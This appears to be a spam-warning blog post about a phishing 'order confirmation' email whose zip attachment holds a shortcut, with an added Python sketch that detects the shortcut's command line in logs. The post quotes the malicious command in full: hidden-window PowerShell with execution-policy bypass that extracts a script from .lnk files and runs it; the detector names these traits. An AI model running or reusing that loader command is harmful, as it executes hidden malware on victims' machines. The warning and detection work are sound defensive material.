Spam Warning: Your Name, Pack(4M0A_8141) confirmed: 5 items sent
This email has been spotted this week:
Sent: Monday, July 30, 2018 10:52 PM
Subject: Your, Name Pack(4M0A_8141) confirmed: 5 items sent
Your order confirmation. Hi Simon, Great news! Your order is now confirmed. We will email you again when your items ship.
Hi Your Name,
Great news! Your order is now confirmed. We will email you again when your items ship.
Thanks for shopping with us!
This email was sent from a notification-only address that cannot accept incoming emails.
Please do not reply to this message. If you have any questions or concerns, please contact us
Which downloads a file: 4M0A_8141-order-Receipt.zip
Zip files are not often used as orders anyway, but this website, https://johanwolf.com, obviously has a valid certificate and is being misused by someone. The website just seems to forward to Office365 support for some reason???
If you unzip the file that is provided you see an image:
Which presumably pretends to be a real company.
And a file which runs a script:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -executionpolicy bypass -win hidDEN -comman cd %USERPROFILE%\Documents; findstr /s bremodilu ..\*.lnk > file.ps1;.\file.ps1;exit
Which will make serious changes to your system. Looking at this, we are not sure it would work, but we might try it on an old PC ..?
We will let you know.
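For anyone hunting for this in process or command-line logs: the shortcut's command abbreviates and mixes the case of its switches (-win hidDEN, -comman), so literal string matching on the full switch names misses it. The Python sketch below is an added example, not part of the email or of the original post; it expands the abbreviated switches and flags the pattern of carving a .ps1 out of .lnk files with findstr and then running it. The trait names, the simplified switch table and the VARIANT and BENIGN samples are assumptions made for illustration.

```python
import re

# Switches relevant to the command above. powershell.exe accepts case-insensitive
# prefixes (-nop, -win, -comman), so literal string matching misses them.
# Simplified assumption: only these switches are modelled; order resolves -e vs -ex.
PARAMS = ("encodedcommand", "executionpolicy", "noprofile", "windowstyle", "command")
ALIASES = {"ep": "executionpolicy"}

def expand(token):
    """Map an abbreviated switch such as '-win' to its full name, or None."""
    name = token.lstrip("-").lower()
    if not name:
        return None
    if name in ALIASES:
        return ALIASES[name]
    return next((p for p in PARAMS if p.startswith(name)), None)

def analyze(cmdline):
    """Return the set of suspicious traits found in one process command line."""
    traits, script = set(), ""
    if not re.search(r"\bpowershell(\.exe)?\b", cmdline, re.I):
        return traits
    tokens = cmdline.split()
    for i, tok in enumerate(tokens):
        if not tok.startswith("-"):
            continue
        full = expand(tok)
        value = tokens[i + 1].lower() if i + 1 < len(tokens) else ""
        if full == "noprofile":
            traits.add("no-profile")
        elif full == "executionpolicy" and value == "bypass":
            traits.add("policy-bypass")
        elif full == "windowstyle" and value == "hidden":
            traits.add("hidden-window")
        elif full == "command":
            script = " ".join(tokens[i + 1:])  # everything after -Command is script
            break
    # findstr output over *.lnk redirected into a .ps1, which is then run
    carve = re.search(r"findstr\b[^;|]*\.lnk\s*>\s*(\S+?\.ps1)", script, re.I)
    if carve:
        traits.add("script-carved-from-lnk")
        run = r"[;&]\s*(\.\\)?" + re.escape(carve.group(1)) + r"\b"
        if re.search(run, script[carve.end():], re.I):
            traits.add("carved-script-executed")
    return traits

# The command line quoted above, verbatim from the page.
PAGE_CMD = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -executionpolicy bypass -win hidDEN -comman cd %USERPROFILE%\Documents; findstr /s bremodilu ..\*.lnk > file.ps1;.\file.ps1;exit"
# Constructed samples: a differently abbreviated variant and a benign call.
VARIANT = r"powershell -w hidden -ep bypass -c findstr /s marker ..\*.lnk > a.ps1; .\a.ps1"
BENIGN = r"powershell.exe -NoProfile -Command Get-ChildItem *.lnk"
```

A command line that shows the hidden window, the policy bypass and both carve traits together is worth an alert; -NoProfile on its own is common in legitimate administration scripts.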
Anyway, report the sender and the website and keep vigilant!